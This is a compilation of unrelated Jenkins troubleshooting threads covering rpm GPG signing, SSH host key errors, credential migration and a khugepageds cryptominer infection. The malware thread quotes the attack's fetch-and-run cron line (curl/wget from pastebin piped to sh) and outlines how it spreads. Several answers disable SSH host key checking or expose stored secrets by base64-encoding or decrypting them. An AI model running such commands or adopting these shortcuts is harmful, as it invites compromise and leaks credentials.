I am trying to copy my entire Jenkins configuration from RHEL 6.7 to RHEL 6.9 , On doing this everything looks good, but only one jenkins build is failing with below error
Enter pass phrase:
can't connect to `/usr/share/tomcat6/.gnupg/S.gpg-agent': No such file or directory
gpg: skipped "Credit": Bad passphrase
gpg: signing failed: Bad passphrase
Pass phrase check failed
The gpg private key 1.4.5 exists in jenkins configuration. Strange thing is , all other builds are able to sign rpm but only one build is failing
Anyone know how to fix it ?
RPM reads the passphrase uses getpass(3) and sends to gnupg through an additional file descriptor.
This creates two problems that need to be handled by automating signing mechanisms:
1) Some versions of rpm use getpass(3) which will use a tty (to disable echoing) and will require setting up a pseudo tty so that the automated password can be passed to RPM. Make sure you have the pty file system mounted, and expect(1) is one way to setup the pty from which the password can be read. There's another approach using /proc file descriptors that can be attempted on linux. The password is then sent to gnupg using --passphrase-fd.
2) gnupg2 can also handle persistent passwords in a separate agent process which is sometimes tricky to setup and keep running "automatically" because the detection depends on both the user/process id's. Your report seems to have an agent (which means gnupg2 or special gpg1 configuration) even though you mention 1.4.5 (which would seem to use gnupg1).
I see two separate issues in your log that need to be addressed.
can't connect to `/usr/share/tomcat6/.gnupg/S.gpg-agent': No such file
or directory
gpg-agent needs to be running as a daemon on the build host, where it will connect to a socket to listen for requests. Perhaps it is already running, but Jenkins is looking for its socket in the wrong directory because GNUPGHOME is set to some unusual value. Or perhaps gpg-agent isn't running and a new instance needs to be started.
Something like this script can be used to safely attach to an existing gpg-agent or spin up a new instance.
#!/bin/bash
# Decide whether to start gpg-agent daemon.
# Create necessary symbolic link in $GNUPGHOME/.gnupg/S.gpg-agent
SOCKET=S.gpg-agent
PIDOF=`pgrep gpg-agent`
RETVAL=$?
if [ "$RETVAL" -eq 1 ]; then
echo "Starting gpg-agent daemon."
eval `gpg-agent --daemon `
else
echo "Daemon gpg-agent already running."
fi
# Nasty way to find gpg-agent's socket file...
GPG_SOCKET_FILE=`find /tmp/gpg-* -name $SOCKET`
echo "Updating socket file link."
cp -fs $GPG_SOCKET_FILE $GNUPGHOME/.gnupg/S.gpg-agent
You may want to substitute pgrep for pidof, depending on your shell.
If you do end up starting a new agent, you can check to see that your keys have been loaded into it by running gpg --list-keys. If you don't see it listed, you'll need to add it using gpg --import. Follow the Jenkins docs for Using Credentials.
Resolving the gpg-agent issue may resolve your other issue, so check to see if your job is working before doing anything else.
References:
www.linuxquestions.org
gpg: skipped "Credit": Bad passphrase
The GPG key is protected by a passphrase. rpm is asking for this passphrase and expects it to be manually entered. Of course, Jenkins is running things non-interactively, so that's not going to be possible. We need some way to supply the passphrase to rpm so it can forward it along to gpg, or else we need to supply the passphrase to gpg directly via some sort of caching mechanism.
The Expect Method
By wrapping our rpm --addsign call in an expect script, we can use expect to enter the passphrase headlessly. This practice is fairly common. Assuming the following script named rpm_sign.exp:
#!/usr/bin/expect -f
set password [lindex $argv 0]
set files [lrange $argv 1 1]
spawn rpm --define --addsign $files
expect "Enter pass phrase:"
send -- "$password\r"
expect eof
This script can be used in a Jenkins shell step or pipeline as follows:
echo "Signing rpms ..."
sh "./rpm_sign.exp '${GPG_PASSPHRASE}' <list-of-files>"
Please note that, with some modifications, it is possible to specify which GPG identity you want to sign your RPMs with. This is done by passing --define {_gpg_name $YOUR_KEY_ID_HERE} as an argument to rpm inside the wrapper script. Note the TCL syntax. Since we're doing this on Jenkins, which may offer multiple sets of credentials, I assume this is relevant info.
References:
aaronhawley.livejournal.com
lists.fedoraproject.org
Other Methods
There are other solutions out there that may be more appropriate to your configuration. One such solution is to use RpmSignPlugin, which uses expect under the hood. Other solutions can be found in this posting on unix.stackexchange.com.
Related
I have a problem when running container_run_and_commit_layer, the error message I get is
docker not found; do you need to manually configure the docker toolchain?
from what I see this is related to DOCKER variable not set:
# Resolve the docker tool path
DOCKER=""
DOCKER_FLAGS=""
if [[ -z "$DOCKER" ]]; then
echo >&2 "error: docker not found; do you need to manually configure the docker toolchain?"
exit 1
fi
I'm calling container_repositories() in my workspace file, am I missing something?
That rule requires Docker to be installed. By default, it expects to find docker via $PATH. When it doesn't, you get that error.
The Setup section of the rules_docker documentation lists all the optional tools, and shows how to set custom paths to them. Some of the rules_docker rules don't need any of those, so they'll work fine. The rules which do need those tools give errors like this when run when the given tools aren't installed.
If you install docker now, you might have to bazel clean --expunge after installing it to ensure the repository rule is evaluated again.
So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.
I tried finding how does jenkins use this command or what to do about it but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When i pkill ofcourse the usage goes down but once restart its back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.
You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.
You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.
Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh.
This vulnerability also added a cron process on your system beware to remove that as well.
Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.
it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.
After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.
A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.
This finally stopped this process from kicking in..
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
Problem was solved with #HeffZilla solution.
I am trying to deploy to another server from Jenkins server, and I can't do it using Jenkins Build script.
When I am on the Jenkins server, I can deploy. For example:
:/var/lib/jenkins/workspace/MyProject$ scp my_file ubuntu#my_address:~/MyProject
Runs perfectly fine; however,
When I specify:
scp my_file ubuntu#my_address:~/MyProject
In "Execute Shell" under build in Jenkins window. I get the following error:
Host key verification failed.
I know that the first time I ran the above command directly on Jenkins server, I was prompted:
The authenticity of host 'my_address (my_address)' can't be established.
ECDSA key fingerprint is cf:4b:58:66:d6:d6:87:35:76:1c:aa:cf:9a:7c:78:cc.
Are you sure you want to continue connecting (yes/no)?
So I had to hit "yes" in order to continue. But since I already directly in the terminal, I don't have to do anything extra.
Second answer to this question: Jenkins Host key verification failed
indicates that, if I understand it correctly.
What am I missing? What can I do to fix my problem?
I got it working, I needed to do two things:
1) I had to use -o StrictHostKeyChecking=no:
scp -v -o StrictHostKeyChecking=no my_file ubuntu#my_address:~/MyProject
instead of:
scp my_file ubuntu#my_address:~/MyProject
2) I needed to copy my id_rsa to /var/lib/jenkins/.ssh
The /var/lib/jenkins/.ssh folder and files inside of it need to be owned by jenkins.
Old question but may be someone would find this useful:
ssh root#jenkinsMaster 'echo "$(ssh-keyscan -t rsa,dsa jenkinsSlave)" >> /root/.ssh/known_hosts'
Make sure that you're first settingup ssh connection to remote host then try to copy the things to remote host.
ssh -o StrictHostKeyChecking=no user#ip_addr
scp file_name user#ip_addr:/home/user
I am using the credentials plugin in Jenkins to manage credentials for git and database access for my team's builds. I would like to copy the credentials from one jenkins instance to another, independent jenkins instance. How would I go about doing this?
UPDATE: TL;DR Follow the link provided below in a comment by Filip Stachowiak it is the easiest way to do it. In case it doesn't work for you go on reading.
Copying the $HUDSON_HOME/credentials.xml is not the solution because Jenkins encrypts paswords and these can't be decrypted by another instance unless both share a common key.
So, either you use the same encription keys in both Jenkins instances (Where's the encryption key stored in Jenkins? ) or what you can do is:
Create the same user/password, you need to share, in the 2nd Jenkins instance so that a valid password is generated
What is really important is that user ids in both credentials.xml are the same. For that (see the credentials.xml example below) for user: Jenkins the identifier <id>c4855f57-5107-4b69-97fd-298e56a9977d</id> must be the same in both credentials.xml
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials#1.22">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
<scope>GLOBAL</scope>
<id>c4855f57-5107-4b69-97fd-298e56a9977d</id>
<description>Para SVN</description>
<username>jenkins</username>
<password>J1ztA2vSXHbm60k5PjLl5jg70ZooSFKF+kRAo08UVts=
</password>
</com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
I was also facing the same problem. What worked for me is I copied the credentials.xml, config.xml and the secrets folder from existing jenkins to the new instance. After the restart of jenkins things worked fine.
This is what worked for me.
Create a job in Jenkins that takes the credentials and writes them to output. If Jenkins replaces the password in the output with ****, just obfuscate it first (add a space between each character, reverse the characters, base64 encode it, etc.)
I used a Powershell job to base64 encode it:
[convert]::ToBase64String([text.encoding]::Default.GetBytes($mysecret))
And then used Powershell to convert the base64 string back to a regular string:
[text.encoding]::Default.GetString([convert]::FromBase64String("bXlzZWNyZXQ="))
After trying quite a few things for several days this is the best solution I found for migrating my secrets from a Jenkins 2.176 to a new clean Jenkins 2.249.1 jenkins-cli was the best approach for me.
The process is quite simple just dump the credentials from the old instance to a local machine, or Docker pod with java installed, as a XML file (unencrypted) and then uploaded to the new instance.
Before starting you should verify the following:
Access to the credentials section on both Jenkins instances
Download the jenkins-ccli.jar from one of the instances (https://www.your-jenkins-url.com/cli/)
Have User and Password/Token at hand.
Notice: In case your jenkins uses an oAuth service you will need to
create a token for your user. Once logged into jenkins at the top
right if you click your profile you can verify both username and
generate password.
Now for the special sauce, you have to execute both parts from the same machine/pod:
Notice: If your instances are using valid Certificates and you want to
secure your connection you must remove the -noCertificateCheck
flag from both commands.
# OLD JENKINS DUMP #
export USER=madox#example.com
export TOKEN=f561banana6ead83b587a4a8799c12c307
export SERVER=https://old-jenkins-url.com/
java -jar jenkins-cli.jar -noCertificateCheck -s $SERVER -auth $USER:$TOKEN list-credentials-as-xml "system::system::jenkins" > /tmp/jenkins_credentials.xml
# NEW JENKINS IMPORT #
export USER=admin
export TOKEN=admin
export SERVER=https://new-jenkins-url.com/
java -jar jenkins-cli.jar -noCertificateCheck -s $SERVER -auth $USER:$TOKEN import-credentials-as-xml "system::system::jenkins" < /tmp/jenkins_credentials.xml
If you have the credentials.xml available and the old Jenkins instance still running, there is a way to decrypt individual credentials so you can enter them in the new Jenkins instance via the UI.
The approach is described over at the DevOps stackexchange by kenorb.
This does not convert all the credentials for an easy, automated migration, but helps when you have only few credentials to migrate (manually).
To summarize, you visit the /script page over at the old Jenkins instance, and use the encrypted credential from the credentials.xml file in the following line:
println(hudson.util.Secret.decrypt("{EncryptedCredentialFromCredentialsXml=}"))
To migrate all credentials to a new server, from Jenkins: Migrating credentials:
Stop Jenkins on new server.
new-server # /etc/init.d/jenkins stop
Remove the identity.key.enc file on new server:
new-server # rm identity.key.enc
Copy secret* and credentials.xml to new server.
current-server # cd /var/lib/jenkins
current-server # tar czvf /tmp/credentials.tgz secret* credentials.xml
current-server # scp credentials.tgz $user#$new-server:/tmp/
new-server # cd /var/lib/jenkins
new-server # tar xzvf /tmp/credentials.tgz -C ./
Start Jenkins.
new-server # /etc/init.d/jenkins start
Migrating users from a Jenkins instance to another Jenkins on a new server -
I tried following https://stackoverflow.com/a/35603191 which lead to https://itsecureadmin.com/2018/03/26/jenkins-migrating-credentials/. However I did not succeed in following these steps.
Further, I experimented exporting /var/lib/jenkins/users (or {JENKINS_HOME}/users) directory to the new instance on new server. After restarting the Jenkins on new server - it looks like all the user credentials are available on new server.
Additionally, I cross-checked if the users can log in to the new Jenkins instance. It works for now.
PS: This code is for redhat servers
Old server:
cd /var/lib/jeknins
or cd into wherever your Jenkins home is
tar cvzf users.tgz ./users
New server:
cd /var/lib/jeknins
scp <user>#<oldserver>:/var/lib/jenkins/user.tgz ~/var/lib/jenkins/.
sudo tar xvzf users.tgz
systemctl restart jenkins
Did you try to copy the $JENKINS_HOME/users folder and the $JENKINS_HOME/credentials.xml file to the other Jenkins instance?
I have a problem with jenkins, setting "git", shows the following error:
Failed to connect to repository : Command "git ls-remote -h https://person#bitbucket.org/person/projectmarket.git HEAD" returned status code 128:
stdout:
stderr: fatal: Authentication failed
I have tested with ssh:
git#bitbucket.org:person/projectmarket.git
This is error:
Failed to connect to repository : Command "git ls-remote -h git#bitbucket.org:person/projectmarket.git HEAD" returned status code 128:
stdout:
stderr: Host key verification failed.
fatal: The remote end hung up unexpectedly
I've also done these steps with "SSH key".
Login under Jenkins
sudo su jenkins
Copy your github key to Jenkins .ssh folder
cp ~/.ssh/id_rsa_github* /var/lib/jenkins/.ssh/
Rename the keys
mv id_rsa_github id_rsa
mv id_rsa_github.pub id_rsa.pub
but still not working git repository in jenkins.
thanks by help!.
Change to the jenkins user and run the command manually:
git ls-remote -h git#bitbucket.org:person/projectmarket.git HEAD
You will get the standard SSH warning when first connecting to a new host via SSH:
The authenticity of host 'bitbucket.org (207.223.240.181)' can't be established.
RSA key fingerprint is 97:8c:1b:f2:6f:14:6b:5c:3b:ec:aa:46:46:74:7c:40.
Are you sure you want to continue connecting (yes/no)?
Type yes and press Enter. The host key for bitbucket.org will now be added to the ~/.ssh/known_hosts file and you won't get this error in Jenkins anymore.
Jenkins is a service account, it doesn't have a shell by design. It is generally accepted that service accounts. shouldn't be able to log in interactively.
To resolve "Jenkins Host key verification failed", do the following steps. I have used mercurial with jenkins.
1)Execute following commands on terminal
$ sudo su -s /bin/bash jenkins
provide password
2)Generate public private key using the following command:
ssh-keygen
you can see output as ::
Generating public/private rsa key pair.
Enter file in which to save the key (/var/lib/jenkins/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
3)Press Enter --> Do not give any passphrase--> press enter
Key has been generated
4) go to --> cat /var/lib/jenkins/.ssh/id_rsa.pub
5) Copy key from id_rsa.pub
6)Exit from bash
7) ssh#yourrepository
8) vi .ssh/authorized_keys
9) Paste the key
10) exit
11)Manually login to mercurial server
Note: Pls do manually login otherwise jenkins will again give error "host verification failed"
12)once manually done, Now go to Jenkins and give build
Enjoy!!!
Good Luck
Or you can use:
ssh -oStrictHostKeyChecking=no host
This will be insecure (man in the middle attacks) but easiest solution.
The better way to do that is to generate correct mappings between host and ip address, so ssh will not complain:
#!/bin/bash
for domain in "github.com" "bitbucket.org"; do
sed -i "/$domain/d" ~/.ssh/known_hosts
line=$(ssh-keyscan $domain,`nslookup $domain | awk '/^Address: / { print $2 ; exit }'`)
echo $line >> ~/.ssh/known_hosts
done
Excerpt from gist.
I think, that many people didnt recognize, at least available since jenkins 2.361:
btw. No Verification is for sure not the best option.
Had same problem, i fix it like that :
reset permission on id_rsa* only for current user no group no other
chmod o-rwx ~/.ssh/id*
chmod G-rwx ~/.ssh/id*
ls -lart ~/.ssh/
-rw------- 1 jenkins nogroup 398 avril 3 09:34 id_rsa.pub
-rw------- 1 jenkins nogroup 1675 avril 3 09:34 id_rsa
And clear ~/.ssh/know_hosts
Now Connect as jenkins
sudo su jenkins
Try the jenkins commands
git ls-remote -h git#bitbucket.org:user/project.git HEAD
If no problem appears, now jenkins will be able to connect the repo (for me ^^ at least)
As for the workaround (e.g. Windows slave), define the following environment variable in global properties:
GIT_SSH_COMMAND="ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
Note: If you don't see the option, you probably need EnvInject plugin for it.
login as jenkins using: "sudo su -s /bin/bash jenkins"
git clone the desired repo which causes the key error
it will ask you to add the key by showing Yes/No (enter yes or y)
that's it!
you can now re-run the jenkins job.
I hope you this will fix your issue.
using https://bitbucket.org/YYYY/XX.git
you shoud delete username#
Make sure we are not editing any of the default sshd_config properties to skip the error
Host Verification Failed - Definitely a missing entry of hostname in known_hosts file
Login to the server where the process is failing and do the following:
Sudo to the user running the process
ssh-copy-id destinationuser#destinationhostname
It will prompt like this for the first time, say yes and it will also ask password for the first time:
The authenticity of host 'sample.org (205.214.640.91)' can't be established.
RSA key fingerprint is 97:8c:1b:f2:6f:14:6b:5c:3b:ec:aa:46:46:74:7c:40.
Are you sure you want to continue connecting (yes/no)? *yes*
Password prompt ? give password
Now from the server where process is running, do ssh destinationuser#destinationhostname. It should login without a password.
Note: Do not change the default permissions of files in the user's .ssh directory, you will end up with different issues
I ran into this issue and it turned out the problem was that the jenkins service wasn't being run as the jenkins user. So running the commands as the jenkins user worked just fine.
Copy host keys from both bitbucket and github:
ssh root#deployserver 'echo "$(ssh-keyscan -t rsa,dsa bitbucket.org)" >> /root/.ssh/known_hosts'
ssh root#deployserver 'echo "$(ssh-keyscan -t rsa,dsa github.com)" >> /root/.ssh/known_hosts'
Best way you can just use your "git url" in 'https" URL format in the Jenkinsfile or wherever you want.
git url: 'https://github.com/jglick/simple-maven-project-with-tests.git'
SSH
If you are trying it with SSH, then the Host key Verification error can come due to several reasons.Follow these steps to overcome all the reasons.
Set the Environment variable as HOME and provide the address as the root directory of .ssh folder. e.g:- If your .ssh is kept inside Name folder.
C:/Users/Name.
Now make sure that the public SSH key is being provided in the repository link also. Either it is github or bitbucket or any other.
Open git bash. And try cloning the project from the repository. This will help in adding your repository URL in the known_host file, which is being auto created in the .ssh folder.
Now open jenkins and create a new job. Then click on configure.
provide the cloning URL in Source code management under Git. The URL should be start with git#github.com/......... or ssh://proje........
Under the Credential you need to add the username and password of your repository form which you are cloning the project. Select that credential.
And now apply and save the configuration.
Bingo! Start building the project. I hope now you will not get any Host Key verification error!
Try
ssh-keygen -R hostname
-R hostname Removes all keys belonging to hostname from a known_hosts file. This option is useful to delete hashed hosts
Use ssh-keyscan should be much more easier:
ssh-keyscan bitbucket.org >> ~/.ssh/known_hosts
This command will put all required hosts to ~/.ssh/known_hosts. You will need to run this command inside your Jenkins machine. You can also create a job and put that command into the "Execute shell" section of the Configure of that job and then execute the job.
issue is with the /var/lib/jenkins/.ssh/known_hosts. It exists in the first case, but not in the second one. This means you are running either on different system or the second case is somehow jailed in chroot or by other means separated from the rest of the filesystem (this is a good idea for running random code from jenkins).
Next steps are finding out how are the chroots for this user created and modify the known hosts inside this chroot. Or just go other ways of ignoring known hosts, such as ssh-keyscan, StrictHostKeyChecking=no or so.
After ssh-keygen probably one only needs to copy the public key to remote host with:
ssh-copy-id -i ~/.ssh/mykey user#host
There is a safe and (relative easy) way to accomplish this, which should also work if you have separate worker nodes/clouds (like docker/kubernetes).
Adding host keys to Jenkins configuration
First go to a console and execute ssh-keyscan your_git_server.url
Copy the output of that command
Then navigate to https://YOUR_JENKINS_URL/manage/configureSecurity/
Scroll down to Git Host Key Verification Configuration
Paste the output of the command into the window. it should look like this:
Both bitbucket and github have pages about their keys and servers. Read them and ensure that you are adding the proper keys and not some random keys
Getting the ssh-keyscan via your Jenkins installation
If you for some reason do not have ssh-keyscan, you can go to the script console ( https://YOUR_JENKINS_URL/manage/script ) and paste in the following script:
def sout = new StringBuilder(), serr = new StringBuilder()
def proc = 'ssh-keyscan bitbucket.org'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "copy this to jenkins>\n$sout"
//println "err> $serr"